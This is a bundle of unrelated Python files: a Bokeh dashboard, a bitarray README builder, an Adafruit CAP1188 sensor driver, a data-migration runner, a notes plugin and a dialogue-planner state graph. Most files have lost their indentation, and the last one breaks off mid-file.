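# Usage sketch (endpoints are illustrative, not part of the original module):
#   create_relay("wss://example.com/relay", "127.0.0.1", 23,
#                secure=True, reconnect=True)
#   ...              # Telnet traffic is now piped over the secure websocket
#   stop_relays()    # tear down all running relays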
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# Prototype of a real-time dashboard
## References
[Bokeh server] https://bokeh.pydata.org/en/latest/docs/user_guide/server.html#userguide-server
"""
# myapp.py
from bokeh.layouts import column
from bokeh.models import Button, ColumnDataSource
from bokeh.plotting import curdoc
from bokeh.models.widgets import DataTable, TableColumn
import numpy as np
def generatePrice():
symbols = ['AAA','BBB','CCC']
prices = np.random.rand(len(symbols)).round(2)
return dict(symbol=symbols,price=prices)
# make table
data = generatePrice()
print('Data: ',data)
currentData = ColumnDataSource(data)
columns = [TableColumn(field="symbol",title="symbol"), TableColumn(field="price",title="price")]
tblPrices = DataTable(source=currentData,columns=columns,width=400, height=280)
def callback():
# test button callback
#currentData.stream(generatePrice())
symbols = ['AAA','BBB','CCC']
prices = np.random.rand(len(symbols)).round(2)
data = [(idx,val) for idx,val in enumerate(prices)]
print('patch: ',data)
patch = {'price':data}
print(patch)
currentData.patch(patch)
# add a button widget and configure with the call back
button = Button(label="Press Me", button_type='primary')
button.on_click(callback)
# put the button and plot in a layout and add to the document
curdoc().add_root(column(button, tblPrices))
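# This is a Bokeh server app: serve it with `bokeh serve --show myapp.py`
# and press the button to patch new random prices into the table.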
|
import os
import re
import doctest
try:
    from cStringIO import StringIO  # Python 2
except ImportError:
    from io import StringIO  # Python 3
import bitarray
fo = StringIO()
def write_changelog():
fo.write("Change log\n"
"----------\n\n")
ver_pat = re.compile(r'(\d{4}-\d{2}-\d{2})\s+(\d+\.\d+\.\d+)')
count = 0
for line in open('CHANGE_LOG'):
m = ver_pat.match(line)
if m:
if count == 3:
break
count += 1
fo.write(m.expand(r'**\2** (\1):\n'))
elif line.startswith('---'):
fo.write('\n')
else:
fo.write(line)
url = "https://github.com/ilanschnell/bitarray/blob/master/CHANGE_LOG"
fo.write("Please find the complete change log\n"
"`here <%s>`_.\n" % url)
sig_pat = re.compile(r'(\w+\([^()]*\))( -> (.+))?')
def write_doc(name):
doc = eval('bitarray.%s.__doc__' % name)
lines = doc.splitlines()
m = sig_pat.match(lines[0])
if m is None:
raise Exception("signature line invalid: %r" % lines[0])
s = '``%s``' % m.group(1)
if m.group(3):
s += ' -> %s' % m.group(3)
fo.write(s + '\n')
assert lines[1] == ''
for line in lines[2:]:
fo.write(' %s\n' % line)
fo.write('\n\n')
def write_reference():
fo.write("Reference\n"
"---------\n\n"
"**The bitarray class:**\n\n")
write_doc('bitarray')
fo.write("**A bitarray object supports the following methods:**\n\n")
for method in sorted(dir(bitarray.bitarray)):
if method.startswith('_'):
continue
write_doc('bitarray.%s' % method)
fo.write("**Functions defined in the module:**\n\n")
write_doc('test')
write_doc('bitdiff')
write_doc('bits2bytes')
def write_all(data):
ver_pat = re.compile(r'(bitarray.+?)(\d+\.\d+\.\d+)')
for line in data.splitlines():
if line == 'Reference':
break
line = ver_pat.sub(lambda m: m.group(1) + bitarray.__version__, line)
fo.write(line + '\n')
write_reference()
write_changelog()
def main():
data = open('README.rst').read()
write_all(data)
new_data = fo.getvalue()
fo.close()
if new_data == data:
print "already up-to-date"
else:
with open('README.rst', 'w') as f:
f.write(new_data)
doctest.testfile('README.rst')
os.system('rst2html.py README.rst >README.html')
if __name__ == '__main__':
main()
|
# The MIT License (MIT)
#
# Copyright (c) 2018 Carter Nelson for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_cap1188.cap1188`
====================================================
CircuitPython driver for the CAP1188 8-Key Capacitive Touch Sensor Breakout.
* Author(s): Carter Nelson
Implementation Notes
--------------------
**Hardware:**
* `CAP1188 - 8-Key Capacitive Touch Sensor Breakout <https://www.adafruit.com/product/1602>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's Bus Device library: https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
"""
from micropython import const
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_CAP1188.git"
# pylint: disable=bad-whitespace
_CAP1188_MID = const(0x5D)
_CAP1188_PID = const(0x50)
_CAP1188_MAIN_CONTROL = const(0x00)
_CAP1188_GENERAL_STATUS = const(0x02)
_CAP1188_INPUT_STATUS = const(0x03)
_CAP1188_LED_STATUS = const(0x04)
_CAP1188_NOISE_FLAGS = const(0x0A)
_CAP1188_DELTA_COUNT = (
const(0x10),
const(0x11),
const(0x12),
const(0x13),
const(0x14),
const(0x15),
const(0x16),
const(0x17),
)
_CAP1188_SENSITIVTY = const(0x1F)
_CAP1188_AVERAGING = const(0x24)
_CAP1188_CAL_ACTIVATE = const(0x26)
_CAP1188_MULTI_TOUCH_CFG = const(0x2A)
_CAP1188_THESHOLD_1 = const(0x30)
_CAP1188_STANDBY_CFG = const(0x41)
_CAP1188_LED_LINKING = const(0x72)
_CAP1188_PRODUCT_ID = const(0xFD)
_CAP1188_MANU_ID = const(0xFE)
_CAP1188_REVISION = const(0xFF)
# pylint: enable=bad-whitespace
_SENSITIVITY = (128, 64, 32, 16, 8, 4, 2, 1)
_AVG = (1, 2, 4, 8, 16, 32, 64, 128)
_SAMP_TIME = ("320us", "640us", "1.28ms", "2.56ms")
_CYCLE_TIME = ("35ms", "70ms", "105ms", "140ms")
class CAP1188_Channel:
# pylint: disable=protected-access
"""Helper class to represent a touch channel on the CAP1188. Not meant to
be used directly."""
def __init__(self, cap1188, pin):
self._cap1188 = cap1188
self._pin = pin
@property
def value(self):
"""Whether the pin is being touched or not."""
return self._cap1188.touched() & (1 << self._pin - 1) != 0
@property
def raw_value(self):
"""The raw touch measurement."""
return self._cap1188.delta_count(self._pin)
@property
def threshold(self):
"""The touch threshold value."""
return self._cap1188._read_register(_CAP1188_THESHOLD_1 + self._pin - 1)
@threshold.setter
def threshold(self, value):
value = int(value)
if not 0 <= value <= 127:
raise ValueError("Threshold value must be in range 0 to 127.")
self._cap1188._write_register(_CAP1188_THESHOLD_1 + self._pin - 1, value)
def recalibrate(self):
"""Perform a self recalibration."""
self._cap1188.recalibrate_pins(1 << self._pin - 1)
class CAP1188:
"""CAP1188 driver base, must be extended for I2C/SPI interfacing."""
def __init__(self):
mid = self._read_register(_CAP1188_MANU_ID)
if mid != _CAP1188_MID:
raise RuntimeError(
"Failed to find CAP1188! Manufacturer ID: 0x{:02x}".format(mid)
)
pid = self._read_register(_CAP1188_PRODUCT_ID)
if pid != _CAP1188_PID:
raise RuntimeError(
"Failed to find CAP1188! Product ID: 0x{:02x}".format(pid)
)
self._channels = [None] * 8
self._write_register(_CAP1188_LED_LINKING, 0xFF) # turn on LED linking
self._write_register(_CAP1188_MULTI_TOUCH_CFG, 0x00) # allow multi touch
self._write_register(0x2F, 0x10) # turn off input-1-sets-all-inputs feature
self.recalibrate()
def __getitem__(self, key):
pin = key
index = key - 1
if pin < 1 or pin > 8:
raise IndexError("Pin must be a value 1-8.")
if self._channels[index] is None:
self._channels[index] = CAP1188_Channel(self, pin)
return self._channels[index]
@property
def touched_pins(self):
"""A tuple of touched state for all pins."""
touched = self.touched()
return tuple([bool(touched >> i & 0x01) for i in range(8)])
def touched(self):
"""Return 8 bit value representing touch state of all pins."""
# clear the INT bit and any previously touched pins
current = self._read_register(_CAP1188_MAIN_CONTROL)
self._write_register(_CAP1188_MAIN_CONTROL, current & ~0x01)
# return only currently touched pins
return self._read_register(_CAP1188_INPUT_STATUS)
@property
def sensitivity(self):
"""The sensitvity of touch detections. Range is 1 (least) to 128 (most)."""
return _SENSITIVITY[self._read_register(_CAP1188_SENSITIVTY) >> 4 & 0x07]
@sensitivity.setter
def sensitivity(self, value):
if value not in _SENSITIVITY:
raise ValueError("Sensitivty must be one of: {}".format(_SENSITIVITY))
value = _SENSITIVITY.index(value) << 4
new_setting = self._read_register(_CAP1188_SENSITIVTY) & 0x8F | value
self._write_register(_CAP1188_SENSITIVTY, new_setting)
@property
def averaging(self):
"""Triple containing the number of samples taken for each channel,
the sample time, and the cycle time."""
register = self._read_register(_CAP1188_AVERAGING)
avg = _AVG[register >> 4 & 0x07]
samp_time = _SAMP_TIME[register >> 2 & 0x03]
cycle_time = _CYCLE_TIME[register & 0x03]
return (avg, samp_time, cycle_time)
@averaging.setter
def averaging(self, value):
if value[0] not in _AVG:
raise ValueError("Avg must be one of: {}".format(_AVG))
if value[1] not in _SAMP_TIME:
raise ValueError("Sample Time must be one of: {}".format(_SAMP_TIME))
if value[2] not in _CYCLE_TIME:
raise ValueError("Cycle Time must be one of: {}".format(_CYCLE_TIME))
avg = _AVG.index(value[0]) << 4
samp_time = _SAMP_TIME.index(value[1]) << 2
cycle_time = _CYCLE_TIME.index(value[2])
self._write_register(_CAP1188_AVERAGING, avg | samp_time | cycle_time)
@property
def thresholds(self):
"""Touch threshold value for all channels."""
return self.threshold_values()
@thresholds.setter
def thresholds(self, value):
value = int(value)
if not 0 <= value <= 127:
raise ValueError("Threshold value must be in range 0 to 127.")
self._write_block(_CAP1188_THESHOLD_1, bytearray((value,) * 8))
def threshold_values(self):
"""Return tuple of touch threshold values for all channels."""
return tuple(self._read_block(_CAP1188_THESHOLD_1, 8))
def recalibrate(self):
"""Perform a self recalibration on all the pins."""
self.recalibrate_pins(0xFF)
def delta_count(self, pin):
"""Return the 8 bit delta count value for the channel."""
if pin < 1 or pin > 8:
raise IndexError("Pin must be a value 1-8.")
# 8 bit 2's complement
raw_value = self._read_register(_CAP1188_DELTA_COUNT[pin - 1])
raw_value = raw_value - 256 if raw_value & 128 else raw_value
return raw_value
def recalibrate_pins(self, mask):
"""Recalibrate pins specified by bit mask."""
self._write_register(_CAP1188_CAL_ACTIVATE, mask)
def _read_register(self, address):
"""Return 8 bit value of register at address."""
raise NotImplementedError
def _write_register(self, address, value):
"""Write 8 bit value to registter at address."""
raise NotImplementedError
def _read_block(self, start, length):
"""Return byte array of values from start address to length."""
raise NotImplementedError
def _write_block(self, start, data):
"""Write out data beginning at start address."""
raise NotImplementedError
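# Usage sketch (illustrative; assumes the CircuitPython I2C front-end that
# normally accompanies this driver, e.g. adafruit_cap1188.i2c.CAP1188_I2C):
#   import board, busio
#   from adafruit_cap1188.i2c import CAP1188_I2C
#   cap = CAP1188_I2C(busio.I2C(board.SCL, board.SDA))
#   for pin in range(1, 9):
#       if cap[pin].value:
#           print("Pin {} touched".format(pin))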
|
#!/usr/bin/env python
# $Id$
"""
many solutions
"""
import puzzler
from puzzler.puzzles.polysticks1234 \
import Polysticks1234TruncatedDiamondLattice6x4 as puzzle
puzzler.run(puzzle)
|
import resnext
img_path = "submissions/2.jpg"
prediction = resnext.resnext_classify(img_path)
print(type(prediction[0]))
|
import datetime
from time import process_time
import sys
from src.odinmigrator import odinlogger, jobconfig, transformation, reference, filetransfer
my_logger = odinlogger.setup_logging("main")
def create_reference(jobdata: dict) -> None:
my_logger.info("Starting reference creation")
reference.create_reference(jobdata=jobdata)
my_logger.info("Ending reference creation")
def read_job_config() -> dict:
my_logger.debug("Read the job config file for setup job")
return jobconfig.read_job_config(sys.argv[1])
def get_ts():
"""
get the current timestamp
:return: current timestamp
"""
return datetime.datetime.today()
def print_job_statistic(start_time_of_job_input, end_time_of_job_input, stats: str, end_status: str):
my_logger.info("========================================================")
my_logger.info("Job statistics : ")
my_logger.info("Job started at : %s", start_time_of_job_input)
my_logger.info("Job ended at : %s", end_time_of_job_input)
duration = end_time_of_job_input - start_time_of_job_input
my_logger.info("Duration : %s ", duration)
my_logger.info("CPU TIME : %s ", process_time())
my_logger.info("Job ended with status %s", end_status)
if __name__ == '__main__':
my_logger.info('Starting Odin\'s data migration tool version 0.0.1-Alpha')
my_logger.info('Starting with parameters %s', str(sys.argv))
start_time_of_job = get_ts()
jobdata = read_job_config()
result = "FAILED"
my_logger.info("Performing job : %s",jobdata['job_name'])
if jobdata['job_type'] == 'createReference':
result = create_reference(jobdata=jobdata)
elif jobdata['job_type'] == 'transformation':
result = transformation.perform_transformation(jobdata=jobdata)
elif jobdata['job_type'] == 'ftp':
result = filetransfer.transfer(jobdata=jobdata)
else:
my_logger.critical("Unknown job_type found. Please check : %s", jobdata['job_type'])
sys.exit(99)
end_time_of_job = get_ts()
print_job_statistic(start_time_of_job, end_time_of_job, None, result)
if result == "FAILED":
sys.exit(99)
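# Example invocation (script and job file names are assumptions; sys.argv[1]
# must point to a job config providing 'job_name' and 'job_type'):
#   python main.py jobs/create_reference.json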
|
""" Lunch Plugin Module
"""
import re
from ashaw_notes.plugins import base_plugin
class Plugin(base_plugin.Plugin):
"""Lunch Plugin Class"""
bypass_today = True
regex = re.compile(r'^((s)?lunch)$')
def is_plugin_note(self, note):
"""Verifies note relates to plugin"""
return bool(self.regex.match(note))
def process_input(self, note):
"""Handle note input"""
return note
def format_note_line(self, timestamp, note_line):
"""Allows enabled plugins to modify note display"""
note_line = Plugin.regex.sub(
"<table style='width:100%;font-weight:bold;background-color:#511;" \
"color:#fff;text-align:center;'>" \
r"<tr><td style='width: 100%;'>\1 break</td></tr></table>",
note_line)
return note_line
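# Example (illustrative): a note of exactly "lunch" or "slunch" matches the
# regex above, and format_note_line() renders it as the highlighted
# "<note> break" HTML table row.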
|
from collections import OrderedDict
psgraph = {
"init": 31,
"goal": 0,
"nodes": {
0: {
"expected_successor": False,
"action": "---",
"state": "0x97918d0",
"distance": 0,
"is_relevant": 1,
"is_goal": 1,
"is_sc": 1,
"successors": [
],
},
1: {
"expected_successor": "0",
"action": "system-book_trip ",
"state": "0x97b3c58",
"distance": 1,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
0,
],
},
5: {
"expected_successor": "1",
"action": "dialogue-followup warn-no_weather",
"state": "0x97bbe18",
"distance": 2,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
1,
],
},
9: {
"expected_successor": "16",
"action": "dialogue-ask_location src",
"state": "0x97ec978",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
18,
],
},
10: {
"expected_successor": "9",
"action": "dialogue-ask_location dst",
"state": "0x97eca48",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
9,
19,
],
},
11: {
"expected_successor": "13",
"action": "dialogue-ask-to-change err-bad_weather",
"state": "0x97ed2d0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
16,
20,
9,
26,
24,
21,
10,
],
},
12: {
"expected_successor": "1",
"action": "web-lookup_weather dst",
"state": "0x97ed4f0",
"distance": 2,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
1,
11,
5,
],
},
13: {
"expected_successor": "12",
"action": "web-lookup_travel ",
"state": "0x97ed5f0",
"distance": 3,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
12,
28,
],
},
17: {
"expected_successor": "16",
"action": "dialogue-followup err-bad_dates",
"state": "0x9815848",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
],
},
18: {
"expected_successor": "9",
"action": "dialogue-followup err-bad_location",
"state": "0x9849508",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
9,
],
},
16: {
"expected_successor": "13",
"action": "dialogue-ask_dates dates",
"state": "0x97ba6c0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
17,
],
},
19: {
"expected_successor": "10",
"action": "dialogue-followup err-bad_location",
"state": "0x98331e8",
"distance": 7,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
10,
],
},
21: {
"expected_successor": "20",
"action": "dialogue-ask_location dst",
"state": "0x986de20",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
20,
23,
],
},
20: {
"expected_successor": "13",
"action": "dialogue-ask_location src",
"state": "0x985f840",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
22,
],
},
22: {
"expected_successor": "20",
"action": "dialogue-followup err-bad_location",
"state": "0x9875418",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
20,
],
},
23: {
"expected_successor": "21",
"action": "dialogue-followup err-bad_location",
"state": "0x9875518",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
21,
],
},
24: {
"expected_successor": "16",
"action": "dialogue-ask_location dst",
"state": "0x98aaa30",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
25,
],
},
25: {
"expected_successor": "24",
"action": "dialogue-followup err-bad_location",
"state": "0x989e8a0",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
24,
],
},
26: {
"expected_successor": "13",
"action": "dialogue-ask_location dst",
"state": "0x98c5ef0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
27,
],
},
27: {
"expected_successor": "26",
"action": "dialogue-followup err-bad_location",
"state": "0x98d8508",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
26,
],
},
28: {
"expected_successor": "13",
"action": "dialogue-ask-to-change err-bad_dates_for_travel",
"state": "0x98ea6c0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
16,
20,
9,
26,
24,
21,
10,
],
},
29: {
"expected_successor": "16",
"action": "dialogue-confirm_location src",
"state": "0x98fc758",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
9,
32,
18,
],
},
30: {
"expected_successor": "29",
"action": "dialogue-ask_location dst",
"state": "0x98fc678",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
29,
33,
],
},
31: {
"expected_successor": "13",
"action": "system-assess_initial_data ",
"state": "0x98fd160",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
16,
21,
10,
26,
24,
34,
29,
35,
30,
20,
9,
],
},
32: {
"expected_successor": "16",
"action": "dialogue-followup msg-affirm",
"state": "0x990b128",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
16,
],
},
33: {
"expected_successor": "30",
"action": "dialogue-followup err-bad_location",
"state": "0x9904f70",
"distance": 7,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
30,
],
},
34: {
"expected_successor": "13",
"action": "dialogue-confirm_location src",
"state": "0x99117d0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
20,
36,
22,
],
},
35: {
"expected_successor": "34",
"action": "dialogue-ask_location dst",
"state": "0x9905388",
"distance": 5,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
34,
37,
],
},
36: {
"expected_successor": "13",
"action": "dialogue-followup msg-affirm",
"state": "0x9911db0",
"distance": 4,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
13,
],
},
37: {
"expected_successor": "35",
"action": "dialogue-followup err-bad_location",
"state": "0x99168c0",
"distance": 6,
"is_relevant": 0,
"is_goal": 0,
"is_sc": 1,
"successors": [
35,
],
},
},
"edges": [
[1, ">", 0],
[5, ">", 1],
[9, ">", 16],
[9, ">", 18],
[10, ">", 9],
[10, ">", 19],
[11, ">", 13],
[11, ">", 16],
[11, ">", 20],
[11, ">", 9],
[11, ">", 26],
[11, ">", 24],
[11, ">", 21],
[11, ">", 10],
[12, ">", 1],
[12, ">", 11],
[12, ">", 5],
[13, ">", 12],
[13, ">", 28],
[17, ">", 16],
[18, ">", 9],
[16, ">", 13],
[16, ">", 17],
[19, ">", 10],
[21, ">", 20],
[21, ">", 23],
[20, ">", 13],
[20, ">", 22],
[22, ">", 20],
[23, ">", 21],
[24, ">", 16],
[24, ">", 25],
[25, ">", 24],
[26, ">", 13],
[26, ">", 27],
[27, ">", 26],
[28, ">", 13],
[28, ">", 16],
[28, ">", 20],
[28, ">", 9],
[28, ">", 26],
[28, ">", 24],
[28, ">", 21],
[28, ">", 10],
[29, ">", 16],
[29, ">", 9],
[29, ">", 32],
[29, ">", 18],
[30, ">", 29],
[30, ">", 33],
[31, ">", 13],
[31, ">", 16],
[31, ">", 21],
[31, ">", 10],
[31, ">", 26],
[31, ">", 24],
[31, ">", 34],
[31, ">", 29],
[31, ">", 35],
[31, ">", 30],
[31, ">", 20],
[31, ">", 9],
[32, ">", 16],
[33, ">", 30],
[34, ">", 13],
[34, ">", 20],
[34, ">", 36],
[34, ">", 22],
[35, ">", 34],
[35, ">", 37],
[36, ">", 13],
[37, ">", 35],
],
"states": {
"0x97918d0": [
"Atom intent-handled-book_ski_trip()",
],
"0x97b3c58": [
"NegatedAtom forced-followup(system)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom ok-travel()",
"Atom ok-weather(dst)",
],
"0x97bbe18": [
"NegatedAtom forced-followup(system)",
"Atom followup-reason(warn-no_weather)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom ok-travel()",
"Atom ok-weather(dst)",
],
"0x97ec978": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x97eca48": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x97ed2d0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(err-bad_weather)",
"NegatedAtom forced-followup(dialogue)",
"Atom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
],
"0x97ed4f0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"Atom ok-travel()",
],
"0x97ed5f0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9815848": [
"NegatedAtom forced-followup(system)",
"Atom followup-reason(err-bad_dates)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9849508": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x97ba6c0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98331e8": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x986de20": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x985f840": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9875418": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9875518": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98aaa30": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x989e8a0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98c5ef0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98d8508": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98ea6c0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(err-bad_dates_for_travel)",
"NegatedAtom forced-followup(dialogue)",
"Atom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
],
"0x98fc758": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98fc678": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x98fd160": [
"Atom forced-followup(system)",
"Atom followup-reason(need-assess_initial_data)",
"NegatedAtom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(src)",
"NegatedAtom ok-travel()",
],
"0x990b128": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(msg-affirm)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9904f70": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
